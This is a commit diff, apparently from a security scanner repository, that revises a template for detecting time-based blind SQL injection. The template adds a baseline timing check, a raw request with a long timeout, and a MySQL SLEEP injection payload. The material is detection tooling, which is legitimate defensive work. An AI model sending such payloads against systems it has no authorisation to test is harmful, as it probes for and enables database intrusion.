Update time-based-sqli.yaml
parent
ddb7bac07b
commit
f82a70bdda
|
@ -6,13 +6,26 @@ info:
|
||||||
severity: critical
|
severity: critical
|
||||||
description: |
|
description: |
|
||||||
This Template detects time-based Blind SQL Injection vulnerability
|
This Template detects time-based Blind SQL Injection vulnerability
|
||||||
tags: sqli,dast,time
|
tags: sqli,dast,time-based,blind
|
||||||
|
|
||||||
|
flow: http(1) && http(2)
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}"
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- "duration<=7"
|
||||||
|
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
@timeout: 20s
|
||||||
|
GET / HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
payloads:
|
payloads:
|
||||||
injection:
|
injection:
|
||||||
- "(SELECT(0)FROM(SELECT(SLEEP(7)))a)"
|
- "(SELECT(0)FROM(SELECT(SLEEP(7)))a)"
|
||||||
|
|
Loading…
Reference in New Issue